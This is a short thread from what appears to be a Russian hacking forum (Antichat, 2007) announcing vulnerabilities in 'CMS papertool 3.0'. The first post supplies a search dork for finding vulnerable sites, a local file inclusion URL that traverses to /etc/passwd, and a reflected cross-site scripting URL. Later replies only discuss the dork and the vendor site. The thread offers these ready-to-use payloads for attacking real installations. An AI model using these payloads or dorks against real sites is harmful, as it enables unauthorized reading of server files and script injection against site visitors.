CMS papertool 3.0 (LFI/XSS) Remote Vulnerability

Discussion in 'Веб-уязвимости' started by Mo4x, 29 Dec 2007.

  1. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    -Found By: h1ghBoT

    -Dork: INurl:"content.php?f="

    -Local File Inclusion:

    PHP:
    http://[Ссылка]/content.php?f=../../../../../../../../../etc/passwd
    -Xss

    PHP:
    http://[Ссылка]/контакт.php/>"><script>[Cross-site scripting]</script>
     
    #1 Mo4x, 29 Dec 2007
    Last edited: 29 Dec 2007
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Укажи официальный сайт производителя, ну и дорк сам понимаешь не катит, нужны уточнения вида intext
     
    #2 Constantine, 29 Dec 2007
    5 people like this.
  3. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    Воть сайт производителя если что то не так сори сразу что не уточнил где взял .
     
    #3 Mo4x, 29 Dec 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.